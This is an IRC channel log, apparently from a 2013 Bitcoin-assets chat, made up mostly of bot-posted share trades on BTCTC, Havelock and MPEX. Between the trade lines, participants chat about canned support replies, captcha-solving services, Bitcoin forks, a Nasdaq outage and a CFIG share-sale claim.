[XBOND] 1 @ 0.00114499 BTC [+] Aug 23 00:30:47 [MPEX] [S.MPOE] 5148 @ 0.00083107 = 4.2783 BTC [-] Aug 23 00:30:49 [MPEX] [S.MPOE] 900 @ 0.00082866 = 0.7458 BTC [-] Aug 23 00:30:52 [MPEX] [S.MPOE] 1852 @ 0.00082671 = 1.5311 BTC [-] Aug 23 00:32:09 [BTCTC] [COGNITIVE] 8 @ 0.3099 = 2.4792 BTC [+] Aug 23 00:32:56 i kinda liked jborkl Aug 23 00:33:47 jurov: its very possible that the monkeys paid to respond to support just seem like stupid macines Aug 23 00:34:09 Well, that is what I have always used- I played MLG as MLG jborkl Aug 23 00:35:22 dub no, it really looks like only canned responses if you read whole thread, no need for human to do this Aug 23 00:35:54 jurov http://www.bbc.co.uk/news/world-asia-india-18391652 Aug 23 00:36:02 but it's cheaper for humans to do this. Aug 23 00:36:05 yeah, the monkeys dont get to write their own responce Aug 23 00:37:18 I deployed a widely used system, 'rightnow' that works along those lines in a former life Aug 23 00:38:15 you feed it a knowledge base and it choses answers based ont eh content in the request, can be configured to fire those back on the off chance on of them is right or a monkey can choose further canned answers Aug 23 00:38:24 well, its english is suspiciously good Aug 23 00:39:02 for live minimal-wage indian Aug 23 00:39:11 we had it so the first responder was machine only and if the requester replies it gets punted to a monkey Aug 23 00:39:31 [BTCTC] [ACTIVEMINING] 18 @ 0.005351 = 0.0963 BTC [+] Aug 23 00:40:19 like I said the monkey just makes a hopefully more intelligent call on which canned answer is sent Aug 23 00:41:23 [BTCTC] [DMS.SELLING] 50 @ 0.0173 = 0.865 BTC [-] Aug 23 00:43:23 [HAVELOCK] [XBOND] 9 @ 0.001136 = 0.0102 BTC [-] Aug 23 00:43:31 in any case, dunno why i feel betrayed. should have expected this. Aug 23 00:43:35 [HAVELOCK] [XBOND] 12 @ 0.001135 = 0.0136 BTC [-] Aug 23 00:44:27 [HAVELOCK] [LABCO] 10 @ 0.00224 = 0.0224 BTC [-] Aug 23 00:46:48 [BTCTC] [ACTIVEMINING] 68 @ 0.005247 = 0.3568 BTC [-] Aug 23 00:47:46 I got a bit of a fright when I discoverd captcha solving services Aug 23 00:48:10 you pay pennies per 1000 captchas solved by real humans Aug 23 00:49:20 [BTCTC] [DMS.SELLING] 2 @ 0.0173 = 0.0346 BTC [-] Aug 23 00:50:52 but hey, free market works right? Aug 23 00:53:33 [BTCTC] [ACTIVEMINING] 1 @ 0.005261 BTC [+] Aug 23 00:53:35 [BTCTC] [ACTIVEMINING] 9 @ 0.005202 = 0.0468 BTC [-] Aug 23 00:56:10 solving captchas for pennies does not waste my time in such straightforward way Aug 23 00:56:31 dub amusiongly, most of those are solved by idiots who don't want to pay for games/online content Aug 23 00:56:41 and figure they're being smart. Aug 23 00:57:23 [HAVELOCK] [LABCO] 450 @ 0.00224 = 1.008 BTC [-] Aug 23 00:57:45 now i wonder whether paying some indian pennies to get me live operator or at least uncanned response would work Aug 23 00:58:09 or even better hiring 100s of them to troll google about some problem lol Aug 23 00:58:44 I didn't read te tread, what could you possibly need to talk to google about? Aug 23 00:58:57 this fucking h key Aug 23 00:59:19 we have a little private google group and one member keeps getting flagged as spam Aug 23 00:59:46 without obvious reason... so his posts are not delivered and waitign for moderation Aug 23 01:00:30 so i did a research and found this thread, of course many ppl have this problem and google ain't doing anything Aug 23 01:00:42 private as in just you, some friends and te american govt Aug 23 01:00:43 [HAVELOCK] [SMG] 20 @ 0.000229 = 0.0046 BTC [-] Aug 23 01:00:45 [HAVELOCK] [SMG] 52 @ 0.0002298 = 0.0119 BTC [+] Aug 23 01:00:47 [HAVELOCK] [SMG] 50 @ 0.0002299 = 0.0115 BTC [+] Aug 23 01:00:49 [HAVELOCK] [SMG] 75 @ 0.00023 = 0.0173 BTC [+] Aug 23 01:00:52 [HAVELOCK] [SMG] 200 @ 0.000235 = 0.047 BTC [+] Aug 23 01:01:01 the answer obviously is don't use google Aug 23 01:01:06 i dutifully read to the very end till that infuriating post Aug 23 01:01:23 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002867 BTC [+] Aug 23 01:01:25 [BTCTC] [TAT.MINIGAME] 131 @ 0.0002543 = 0.0333 BTC [-] Aug 23 01:02:11 well, it's something like knitting-circle stuff... pita to move it elsewhere and explain to everyone Aug 23 01:02:13 yeah i have been slowly abandoning google ship Aug 23 01:02:24 [BTCTC] [TAT.MINIGAME] 3793 @ 0.0002543 = 0.9646 BTC [-] Aug 23 01:02:25 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002542 = 0.0254 BTC [-] Aug 23 01:02:27 [BTCTC] [TAT.MINIGAME] 10 @ 0.000252 = 0.0025 BTC [-] Aug 23 01:02:28 [BTCTC] [TAT.MINIGAME] 7 @ 0.000252 = 0.0018 BTC [-] Aug 23 01:02:29 [BTCTC] [TAT.MINIGAME] 950 @ 0.000249 = 0.2366 BTC [-] Aug 23 01:02:30 [BTCTC] [TAT.MINIGAME] 167 @ 0.000248 = 0.0414 BTC [-] Aug 23 01:02:44 [MPEX] [S.MG] 5000 @ 0.000235 = 1.175 BTC [-] Aug 23 01:04:15 jurov irc ftw. Aug 23 01:04:17 we already moved the forum on to friend's server after bad experience with forumup paid service Aug 23 01:04:27 just distribute webirc links Aug 23 01:04:54 i'd have to maintain log then Aug 23 01:04:58 anyway Aug 23 01:04:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.02971 BTC [-] Aug 23 01:05:00 [BTCTC] [TAT.ASICMINER] 17 @ 0.0297 = 0.5049 BTC [-] Aug 23 01:05:19 a that;'s a point. Aug 23 01:05:22 [BTCTC] [ACTIVEMINING] 1 @ 0.005328 BTC [+] Aug 23 01:06:26 [BTCTC] [ACTIVEMINING] 28 @ 0.005328 = 0.1492 BTC [+] Aug 23 01:06:46 [BTCTC] [ACTIVEMINING] 1 @ 0.005328 BTC [+] Aug 23 01:06:47 [BTCTC] [ACTIVEMINING] 48 @ 0.005329 = 0.2558 BTC [+] Aug 23 01:06:51 even getting people to change the forum was not easy, still only few registered.. i cant imagine trying irc Aug 23 01:07:09 [HAVELOCK] [LABCO] 100 @ 0.00224 = 0.224 BTC [-] Aug 23 01:07:26 [HAVELOCK] [LABCO] 4 @ 0.00224 = 0.009 BTC [-] Aug 23 01:07:28 I know your pain Aug 23 01:07:52 [HAVELOCK] [XBOND] 1 @ 0.00112013 BTC [-] Aug 23 01:07:55 I used to manage a comunity where it was unusual for a family of 10 to have more than one email address Aug 23 01:08:06 [BTCTC] [ACTIVEMINING] 43 @ 0.005202 = 0.2237 BTC [-] Aug 23 01:17:13 [BTCTC] [HOSTED-MINING] 3 @ 0.28 = 0.84 BTC [+] Aug 23 01:20:47 [BTCTC] [ACTIVEMINING] 6 @ 0.005324 = 0.0319 BTC [+] Aug 23 01:22:07 [BTCTC] [ACTIVEMINING] 6 @ 0.005324 = 0.0319 BTC [+] Aug 23 01:23:25 [HAVELOCK] [SDSTM] 2 @ 0.0056 = 0.0112 BTC [+] Aug 23 01:24:02 [BTCTC] [ACTIVEMINING] 6 @ 0.005324 = 0.0319 BTC [+] Aug 23 01:25:55 [HAVELOCK] [VTX] 1 @ 0.655 BTC [+] Aug 23 01:26:19 [HAVELOCK] [HIM] 2 @ 0.2226 = 0.4452 BTC [-] Aug 23 01:29:44 !ticker btctc DMS.MINING Aug 23 01:29:46 [BTCT:DMS.MINING] 1D: 0.003 / 0.00341 / 0.003705 (17246 shares, 58.8 BTC), 7D: 0.002866 / 0.00329 / 0.003705 (72007 shares, 236.8 BTC), 30D: 0.002511 / 0.00538 / 0.01479 (220001 shares, 1184 BTC) Aug 23 01:29:49 !ticker btctc DMS.SELLING Aug 23 01:29:51 [BTCT:DMS.SELLING] 1D: 0.01675 / 0.01697 / 0.0175 (659 shares, 11.2 BTC), 7D: 0.0165 / 0.01761 / 0.01813 (17173 shares, 302.4 BTC), 30D: 0.0165 / 0.0209 / 0.02646 (90747 shares, 1896.6 BTC) Aug 23 01:30:07 .d Aug 23 01:30:07 50810339.04828 | Next Diff in 326 blocks | Estimated Change: 27.8521% in 1d 15h 9m 22s Aug 23 01:30:28 huhu Aug 23 01:30:32 [BTCTC] [DMS.MINING] 50 @ 0.003459 = 0.173 BTC [+] Aug 23 01:30:45 mircea_popescu: do you have a driver? Aug 23 01:31:09 citadel is easy enough to install Aug 23 01:31:41 thestringpuller yea Aug 23 01:31:47 [BTCTC] [TAT.ASICMINER] 2 @ 0.03043 = 0.0609 BTC [+] Aug 23 01:33:31 [BTCTC] [HOSTED-MINING] 1 @ 0.271 BTC [-] Aug 23 01:34:07 do you ride in a maybach? Aug 23 01:34:10 [BTCTC] [HOSTED-MINING] 177 @ 0.27 = 47.79 BTC [-] Aug 23 01:34:14 That'd be soooo cool. Aug 23 01:34:24 nope Aug 23 01:35:20 you should trade 1 bitcoin for a maybach Aug 23 01:35:42 [BTCTC] [ASICMINER-PT] 1 @ 3.055 BTC [-] Aug 23 01:35:44 [BTCTC] [ASICMINER-PT] 4 @ 3.054 = 12.216 BTC [-] Aug 23 01:36:15 what do i need a maybach for ? Aug 23 01:36:16 mircea_popescu: so if special interests make there way into the bitcoin codebase and everyone goes along with it...what then? Aug 23 01:36:25 it forks. Aug 23 01:36:26 you don't need a maybach, you're not a rapper Aug 23 01:36:30 it forks eh? Aug 23 01:36:35 i figured as much Aug 23 01:36:49 inb4 i want maybach Aug 23 01:37:00 [BTCTC] [DMS.MINING] 50 @ 0.003459 = 0.173 BTC [+] Aug 23 01:37:10 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [-] Aug 23 01:37:26 basically this entire thing will come sooner or later to yet another rendition of no pasaran. Aug 23 01:39:47 [BTCTC] [DMS.SELLING] 50 @ 0.0171 = 0.855 BTC [-] Aug 23 01:40:01 [BTCTC] [DMS.MINING] 100 @ 0.003459 = 0.3459 BTC [+] Aug 23 01:41:51 is that like a lord of the rings reference? Aug 23 01:42:27 nope Aug 23 01:42:55 [BTCTC] [DMS.MINING] 10 @ 0.003459 = 0.0346 BTC [+] Aug 23 01:44:58 it was from fight for madrid (and they did get through anyway) Aug 23 01:46:26 jurov actually it's from ww1, battle of verdun, from romanian battle of marasesti, from a bunch of various contexts. Aug 23 01:46:32 sometimes they pass, sometimes they don't. Aug 23 01:48:22 [BTCTC] [LABCOIN] 1 @ 0.002375 BTC [+] Aug 23 01:48:51 [BTCTC] [LABCOIN] 1 @ 0.002375 BTC [+] Aug 23 01:49:35 hm, open source software isn't there since yesterday, so there should be ample precedent Aug 23 01:50:03 [BTCTC] [LABCOIN] 1 @ 0.002375 BTC [+] Aug 23 01:50:12 but can't think of any.. or maybe everything was successfully disguised as mistake or feature Aug 23 01:52:05 [MPEX] [S.MPOE] 5095 @ 0.00082842 = 4.2208 BTC [+] Aug 23 01:53:19 so yea Aug 23 01:53:24 I guess I can't hate anymore on mtgox Aug 23 01:53:39 when not even the nyse can keep their shit together Aug 23 01:53:50 i mean holy shit Aug 23 01:54:34 taub you mean the nasdaq ? Aug 23 01:54:47 nasdaq, sorry yes Aug 23 01:54:54 the nyse embarassment was last year. Aug 23 01:56:05 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [+] Aug 23 01:56:40 [MPEX] [S.MPOE] 1000 @ 0.00083193 = 0.8319 BTC [+] Aug 23 01:57:23 [BTCTC] [DMS.SELLING] 100 @ 0.0172 = 1.72 BTC [+] Aug 23 01:57:50 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [+] Aug 23 01:58:23 just remebered a patch into linux kernel containing Aug 23 01:58:28 if (uid = 0) Aug 23 01:58:36 ... Aug 23 01:58:38 ....... Aug 23 01:58:47 but that was quite lame Aug 23 01:59:21 speaking of lame, its 2013 and the guy next to me just built a 32k ATM circuit Aug 23 02:00:35 [BTCTC] [TAT.ASICMINER] 28 @ 0.03075 = 0.861 BTC [+] Aug 23 02:00:57 what's that? Aug 23 02:01:11 half a DS0 Aug 23 02:01:15 :) Aug 23 02:01:31 its a very small, very expensive data pipe Aug 23 02:01:37 built? Aug 23 02:04:17 oh my... yes, we had that at uni including arcane details how ethernet frames are transmitted thru Aug 23 02:06:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.03 BTC [-] Aug 23 02:06:33 [BTCTC] [DMS.SELLING] 20 @ 0.0172 = 0.344 BTC [+] Aug 23 02:07:48 [BTCTC] [ASICMINER-PT] 1 @ 3.055 BTC [+] Aug 23 02:12:33 .d Aug 23 02:12:34 50810339.04828 | Next Diff in 321 blocks | Estimated Change: 27.8096% in 1d 14h 35m 44s Aug 23 02:13:49 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [+] Aug 23 02:14:10 [BTCTC] [DMS.SELLING] 30 @ 0.0172 = 0.516 BTC [+] Aug 23 02:15:42 [BTCTC] [DMS.MINING] 7 @ 0.003459 = 0.0242 BTC [+] Aug 23 02:19:14 [BTCTC] [DMS.SELLING] 1 @ 0.0172 BTC [+] Aug 23 02:19:35 [BTCTC] [DMS.SELLING] 49 @ 0.0173 = 0.8477 BTC [+] Aug 23 02:22:14 [BTCTC] [TAT.ASICMINER] 10 @ 0.03075 = 0.3075 BTC [+] Aug 23 02:23:38 [BTCTC] [KENILWORTH] 150 @ 0.001796 = 0.2694 BTC [-] Aug 23 02:25:11 [BTCTC] [LABCOIN] 5 @ 0.002374 = 0.0119 BTC [-] Aug 23 02:26:14 [BTCTC] [LABCOIN] 1 @ 0.002374 BTC [-] Aug 23 02:28:28 dude Maybach's have foot rests in the back Aug 23 02:28:39 and cooled cup holders Aug 23 02:28:46 a roof that completely slides back Aug 23 02:28:49 it's cray cray Aug 23 02:40:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.02057 BTC [-] Aug 23 02:41:41 [BTCTC] [DMS.MINING] 43 @ 0.003466 = 0.149 BTC [+] Aug 23 02:44:03 [BTCTC] [DMS.SELLING] 15 @ 0.0173 = 0.2595 BTC [+] Aug 23 02:44:21 [BTCTC] [LABCOIN] 1000 @ 0.002374 = 2.374 BTC [-] Aug 23 02:44:47 [BTCTC] [DMS.SELLING] 36 @ 0.01735 = 0.6246 BTC [+] Aug 23 02:45:32 [BTCTC] [DMS.SELLING] 1 @ 0.017 BTC [-] Aug 23 02:45:35 [BTCTC] [LABCOIN] 50 @ 0.002374 = 0.1187 BTC [-] Aug 23 02:46:55 [BTCTC] [DMS.MINING] 383 @ 0.003466 = 1.3275 BTC [+] Aug 23 02:49:04 [BTCTC] [DMS.SELLING] 10 @ 0.01735 = 0.1735 BTC [+] Aug 23 02:49:58 [BTCTC] [DMS.MINING] 10 @ 0.003466 = 0.0347 BTC [+] Aug 23 02:59:58 [HAVELOCK] [AM100] 1 @ 0.03 BTC [+] Aug 23 03:02:10 [HAVELOCK] [AM100] 4 @ 0.03 = 0.12 BTC [+] Aug 23 03:04:22 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002856 BTC [+] Aug 23 03:08:22 [BTCTC] [ASICMINER-PT] 1 @ 3.055 BTC [+] Aug 23 03:11:03 [BTCTC] [ASICMINER-PT] 1 @ 3.053 BTC [-] Aug 23 03:15:00 [BTCTC] [TAT.ASICMINER] 20 @ 0.03055 = 0.611 BTC [-] Aug 23 03:15:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.03055 = 0.3055 BTC [-] Aug 23 03:15:21 [BTCTC] [TAT.ASICMINER] 10 @ 0.03055 = 0.3055 BTC [-] Aug 23 03:18:20 [BTCTC] [ASICMINER-PT] 2 @ 3.06 = 6.12 BTC [+] Aug 23 03:22:29 [HAVELOCK] [LABCO] 12 @ 0.00224 = 0.0269 BTC [-] Aug 23 03:24:17 [BTCTC] [BTC-GROWTH] 200 @ 0.1002 = 20.04 BTC [+] Aug 23 03:24:20 [BTCTC] [LTC-ATF.B2] 1 @ 0.01042 BTC [+] Aug 23 03:26:06 [BTCTC] [ASICMINER-PT] 1 @ 3.053 BTC [-] Aug 23 03:26:31 [BTCTC] [HOSTED-MINING] 10 @ 0.28 = 2.8 BTC [+] Aug 23 03:27:47 [BTCTC] [ACTIVEMINING] 50 @ 0.005325 = 0.2663 BTC [+] Aug 23 03:27:48 [BTCTC] [ACTIVEMINING] 29 @ 0.005326 = 0.1545 BTC [+] Aug 23 03:27:50 [BTCTC] [ACTIVEMINING] 68 @ 0.005331 = 0.3625 BTC [+] Aug 23 03:27:51 [BTCTC] [ACTIVEMINING] 436 @ 0.005399 = 2.354 BTC [+] Aug 23 03:27:52 [BTCTC] [ACTIVEMINING] 1747 @ 0.0054 = 9.4338 BTC [+] Aug 23 03:35:27 [BTCTC] [LABCOIN] 1500 @ 0.002373 = 3.5595 BTC [-] Aug 23 03:35:28 [BTCTC] [LABCOIN] 500 @ 0.002374 = 1.187 BTC [+] Aug 23 03:38:17 [BTCTC] [HOSTED-MINING] 10 @ 0.28 = 2.8 BTC [+] Aug 23 03:41:46 [BTCTC] [ACTIVEMINING] 50 @ 0.005419 = 0.271 BTC [+] Aug 23 03:42:14 [BTCTC] [ACTIVEMINING] 38 @ 0.005422 = 0.206 BTC [+] Aug 23 03:42:41 [BTCTC] [ACTIVEMINING] 155 @ 0.005423 = 0.8406 BTC [+] Aug 23 03:42:56 [BTCTC] [ACTIVEMINING] 250 @ 0.005432 = 1.358 BTC [+] Aug 23 03:43:08 [BTCTC] [ACTIVEMINING] 1000 @ 0.005433 = 5.433 BTC [+] Aug 23 03:47:34 [HAVELOCK] [LABCO] 17 @ 0.00225 = 0.0383 BTC [+] Aug 23 03:49:43 [BTCTC] [DMS.MINING] 6 @ 0.00345 = 0.0207 BTC [-] Aug 23 03:52:46 [HAVELOCK] [AM100] 2 @ 0.02991011 = 0.0598 BTC [-] Aug 23 03:55:15 [BTCTC] [LABCOIN] 444 @ 0.002374 = 1.0541 BTC [+] Aug 23 03:55:17 [BTCTC] [LABCOIN] 4000 @ 0.002385 = 9.54 BTC [+] Aug 23 03:55:18 [BTCTC] [LABCOIN] 10 @ 0.002386 = 0.0239 BTC [+] Aug 23 03:55:19 [BTCTC] [LABCOIN] 1000 @ 0.002387 = 2.387 BTC [+] Aug 23 03:55:20 [BTCTC] [LABCOIN] 4 @ 0.002399 = 0.0096 BTC [+] Aug 23 03:55:21 [BTCTC] [LABCOIN] 100 @ 0.0024 = 0.24 BTC [+] Aug 23 03:55:22 [BTCTC] [LABCOIN] 1591 @ 0.0024 = 3.8184 BTC [+] Aug 23 03:55:24 [BTCTC] [HOSTED-MINING] 1 @ 0.28 BTC [+] Aug 23 03:56:54 [BTCTC] [LABCOIN] 200 @ 0.00242 = 0.484 BTC [+] Aug 23 04:06:12 [BTCTC] [ASICMINER-PT] 1 @ 3.053 BTC [-] Aug 23 04:06:14 [BTCTC] [ASICMINER-PT] 2 @ 3.052 = 6.104 BTC [-] Aug 23 04:09:16 [BTCTC] [CRYPTO-TRADE] 12 @ 0.2 = 2.4 BTC [+] Aug 23 04:09:39 [BTCTC] [ASICMINER-PT] 1 @ 3.051 BTC [-] Aug 23 04:11:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.02966 = 0.2373 BTC [-] Aug 23 04:12:08 [BTCTC] [ASICMINER-PT] 2 @ 3.05 = 6.1 BTC [-] Aug 23 04:12:09 [BTCTC] [ASICMINER-PT] 1 @ 3.05 BTC [-] Aug 23 04:12:11 [BTCTC] [ASICMINER-PT] 1 @ 3.037 BTC [-] Aug 23 04:12:12 [BTCTC] [ASICMINER-PT] 1 @ 3.02 BTC [-] Aug 23 04:12:13 [BTCTC] [ASICMINER-PT] 2 @ 3.015 = 6.03 BTC [-] Aug 23 04:12:14 [BTCTC] [ASICMINER-PT] 4 @ 3.011 = 12.044 BTC [-] Aug 23 04:12:15 [BTCTC] [ASICMINER-PT] 1 @ 3.01 BTC [-] Aug 23 04:12:16 [BTCTC] [ASICMINER-PT] 1 @ 3.01 BTC [-] Aug 23 04:12:18 [BTCTC] [ASICMINER-PT] 4 @ 3.001 = 12.004 BTC [-] Aug 23 04:12:22 [HAVELOCK] [CFIG] 10 @ 0.15 = 1.5 BTC Aug 23 04:13:24 [BTCTC] [TAT.ASICMINER] 11 @ 0.02967 = 0.3264 BTC [+] Aug 23 04:14:25 [BTCTC] [CRYPTO-TRADE] 18 @ 0.2 = 3.6 BTC [+] Aug 23 04:14:39 [BTCTC] [TAT.ASICMINER] 6 @ 0.02968 = 0.1781 BTC [+] Aug 23 04:15:02 [BTCTC] [LABCOIN] 32851 @ 0.0024 = 78.8424 BTC [-] Aug 23 04:16:04 [BTCTC] [LABCOIN] 20 @ 0.002317 = 0.0463 BTC [-] Aug 23 04:16:05 [BTCTC] [LABCOIN] 43 @ 0.002317 = 0.0996 BTC [-] Aug 23 04:16:47 [BTCTC] [TAT.MINIGAME] 2600 @ 0.0002877 = 0.748 BTC [+] Aug 23 04:18:06 [BTCTC] [LABCOIN] 10 @ 0.002316 = 0.0232 BTC [-] Aug 23 04:18:26 [BTCTC] [LABCOIN] 85 @ 0.002317 = 0.1969 BTC [+] Aug 23 04:20:00 [BTCTC] [DMS.SELLING] 11 @ 0.0173 = 0.1903 BTC [-] Aug 23 04:21:54 [BTCTC] [DMS.MINING] 30 @ 0.0034 = 0.102 BTC [-] Aug 23 04:21:56 [BTCTC] [DMS.MINING] 9 @ 0.0034 = 0.0306 BTC [-] Aug 23 04:21:56 [BTCTC] [DMS.MINING] 12 @ 0.003395 = 0.0407 BTC [-] Aug 23 04:21:57 [BTCTC] [DMS.MINING] 140 @ 0.00339 = 0.4746 BTC [-] Aug 23 04:21:58 [BTCTC] [DMS.MINING] 1 @ 0.00339 BTC [-] Aug 23 04:22:00 [BTCTC] [DMS.MINING] 764 @ 0.003389 = 2.5892 BTC [-] Aug 23 04:25:43 [BTCTC] [S.MPOE-PT] 249 @ 0.0008332 = 0.2075 BTC [-] Aug 23 04:26:00 [BTCTC] [S.MPOE-PT] 2 @ 0.0008331 = 0.0017 BTC [-] Aug 23 04:26:02 [BTCTC] [S.MPOE-PT] 78 @ 0.000833 = 0.065 BTC [-] Aug 23 04:30:39 [BTCTC] [BFMINES] 1 @ 0.0014 BTC [+] Aug 23 04:33:57 [HAVELOCK] [LABCO] 660 @ 0.00225 = 1.485 BTC [+] Aug 23 04:35:55 [BTCTC] [HOSTED-MINING] 3 @ 0.28 = 0.84 BTC [+] Aug 23 04:36:28 [HAVELOCK] [AM100] 47 @ 0.03 = 1.41 BTC [+] Aug 23 04:37:00 [BTCTC] [DMS.MINING] 6 @ 0.00344 = 0.0206 BTC [+] Aug 23 04:37:11 [HAVELOCK] [XBOND] 400 @ 0.00116399 = 0.4656 BTC [+] Aug 23 04:37:33 [HAVELOCK] [SMG] 3 @ 0.00024 = 0.0007 BTC [+] Aug 23 04:38:14 [BTCTC] [BASIC-MINING] 1 @ 0.2795 BTC [+] Aug 23 04:40:20 [BTCTC] [DMS.MINING] 1 @ 0.00344 BTC [+] Aug 23 04:42:33 [BTCTC] [ASICMINER-PT] 1 @ 3.095 BTC [+] Aug 23 04:42:34 [BTCTC] [ASICMINER-PT] 1 @ 3.099 BTC [+] Aug 23 04:42:35 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [+] Aug 23 04:42:37 [BTCTC] [ASICMINER-PT] 3 @ 3.1 = 9.3 BTC [+] Aug 23 04:47:28 [BTCTC] [BFMINES] 1 @ 0.001999 BTC [+] Aug 23 04:47:53 [BTCTC] [BFMINES] 19 @ 0.002 = 0.038 BTC [+] Aug 23 04:53:11 [BTCTC] [ACTIVEMINING] 50 @ 0.005457 = 0.2729 BTC [+] Aug 23 04:53:26 [BTCTC] [ACTIVEMINING] 1 @ 0.00548 BTC [+] Aug 23 04:53:39 [BTCTC] [ACTIVEMINING] 83 @ 0.005499 = 0.4564 BTC [+] Aug 23 04:53:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.0055 = 5.5 BTC [+] Aug 23 04:53:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.02973 = 0.2973 BTC [+] Aug 23 04:53:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.02973 = 1.4865 BTC [+] Aug 23 04:54:06 [BTCTC] [TAT.ASICMINER] 2 @ 0.02973 = 0.0595 BTC [+] Aug 23 04:54:53 [BTCTC] [ASICMINER-PT] 1 @ 3.008 BTC [-] Aug 23 04:57:20 topace, are you around? Aug 23 04:57:38 talk to his lawyers Aug 23 04:57:54 lol Aug 23 04:58:32 [BTCTC] [DMS.SELLING] 19 @ 0.0173 = 0.3287 BTC [-] Aug 23 04:58:54 When he said "CFIG has confirmed that the private investors will NOT sell _any_ of their shares on havelock, until CFIG is officially in operation (aka, its verifyable that people have opened accounts with them and deposited/withdrawn fiat)"... Aug 23 04:59:15 [HAVELOCK] [XBOND] 235 @ 0.00116399 = 0.2735 BTC [+] Aug 23 04:59:15 ...where did he get that from? Can't see it in the bitcointalk thread. Aug 23 05:00:36 where did you get it from? Aug 23 05:00:53 http://log.bitcoin-assets.com Aug 23 05:01:03 He got the info from CFIG, I'd assume. Aug 23 05:01:17 somebody actually uses that thing. Aug 23 05:01:21 incredible Aug 23 05:01:33 kakobrekla everyone uses it lol Aug 23 05:01:37 [BTCTC] [TAT.ASICMINER] 39 @ 0.02968 = 1.1575 BTC [-] Aug 23 05:01:38 [BTCTC] [TAT.ASICMINER] 19 @ 0.02968 = 0.5639 BTC [-] Aug 23 05:01:41 it's marginally better than the real thing Aug 23 05:01:44 I doubt he had direct access to the investors. Aug 23 05:02:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.02968 BTC [-] Aug 23 05:02:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.02975 BTC [+] Aug 23 05:02:52 [BTCTC] [ASICMINER-PT] 1 @ 3.1 BTC [+] Aug 23 05:03:57 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002457 = 0.0246 BTC [-] **** BEGIN LOGGING AT Fri Aug 23 12:34:23 2013 Aug 23 12:35:12 [BTCTC] [TAT.ASICMINER] 3 @ 0.02998 = 0.0899 BTC [+] Aug 23 12:36:02 [BTCTC] [DMS.SELLING] 1 @ 0.01701 BTC [-] Aug 23 12:38:33 [BTCTC] [LABCOIN] 1000 @ 0.0027 = 2.7 BTC [-] Aug 23 12:47:27 [HAVELOCK] [XBOND] 90 @ 0.001171 = 0.1054 BTC [+] Aug 23 12:58:22 [BTCTC] [LABCOIN] 200 @ 0.0027 = 0.54 BTC [-] Aug 23 13:04:32 [BTCTC] [ASICMINER-PT] 3 @ 3.75 = 11.25 BTC [+] Aug 23 13:05:31 .d Aug 23 13:05:44 ;;echo .d Aug 23 13:05:44 .d Aug 23 13:05:47 50810339.04828 | Next Diff in 228 blocks | Estimated Change: 28.5679% in 1d 2h 58m 57s Aug 23 13:25:41 [BTCTC] [DMS.MINING] 2 @ 0.0034 = 0.0068 BTC [+] Aug 23 13:33:38 [BTCTC] [LABCOIN] 1278 @ 0.002621 = 3.3496 BTC [-] Aug 23 13:34:32 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9317 BTC [+] Aug 23 13:39:10 <@assbot> [BTCTC] [ASICMINER-PT] 3 @ 3.75 = 11.25 BTC [+] huh this cant be right? Aug 23 13:41:48 option probably Aug 23 13:44:24 [BTCTC] [LABCOIN] 3308 @ 0.00262 = 8.667 BTC [-] Aug 23 13:48:51 [BTCTC] [BTC-GROWTH] 7 @ 0.1001 = 0.7007 BTC [-] Aug 23 13:49:15 [BTCTC] [LABCOIN] 1000 @ 0.00262 = 2.62 BTC [-] Aug 23 13:57:13 are more ppl having issues with btct atm? Aug 23 13:57:19 getting cloadflare errors... Aug 23 13:57:21 [BTCTC] [BTC-GROWTH] 141 @ 0.1002 = 14.1282 BTC [+] Aug 23 14:00:15 same, cant view my portfolio Aug 23 14:02:03 I can login, view portfolio (sometimes) but can't go to an asset.. Aug 23 14:12:37 [HAVELOCK] [SDSTM] 5 @ 0.0051 = 0.0255 BTC [+] Aug 23 14:13:25 [HAVELOCK] [LABCO] 9 @ 0.00258 = 0.0232 BTC [+] Aug 23 14:13:59 [BTCTC] [BTC-GROWTH] 52 @ 0.1003 = 5.2156 BTC [+] Aug 23 14:22:23 [BTCTC] [DMS.MINING] 1 @ 0.003389 BTC [-] Aug 23 14:26:22 [HAVELOCK] [AM100] 10 @ 0.02831 = 0.2831 BTC [-] Aug 23 14:26:30 [HAVELOCK] [SDSTM] 10 @ 0.00500001 = 0.05 BTC [-] Aug 23 14:26:33 [HAVELOCK] [SDSTM] 5 @ 0.005 = 0.025 BTC [-] Aug 23 14:26:35 [HAVELOCK] [AM100] 100 @ 0.0283 = 2.83 BTC [-] Aug 23 14:26:38 [HAVELOCK] [XBOND] 2 @ 0.001171 = 0.0023 BTC [+] Aug 23 14:27:07 [HAVELOCK] [CFIG] 20 @ 0.15 = 3 BTC Aug 23 14:28:13 [HAVELOCK] [AM100] 3 @ 0.0302 = 0.0906 BTC [+] Aug 23 14:32:39 >chanserv< access #trilema list Aug 23 14:32:52 >chanserv< access #bitcoin-assets list Aug 23 14:37:47 [BTCTC] [LABCOIN] 150 @ 0.002621 = 0.3932 BTC [+] Aug 23 14:42:24 [BTCTC] [DMS.MINING] 5 @ 0.0034 = 0.017 BTC [+] Aug 23 14:42:34 [BTCTC] [TAT.ASICMINER] 10 @ 0.02998 = 0.2998 BTC [+] Aug 23 14:56:14 [BTCTC] [DMS.MINING] 2 @ 0.0034 = 0.0068 BTC [+] Aug 23 15:01:38 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001222 = 0.1222 BTC [-] Aug 23 15:05:34 [BTCTC] [LABCOIN] 200 @ 0.002621 = 0.5242 BTC [+] Aug 23 15:11:47 [HAVELOCK] [AM100] 1 @ 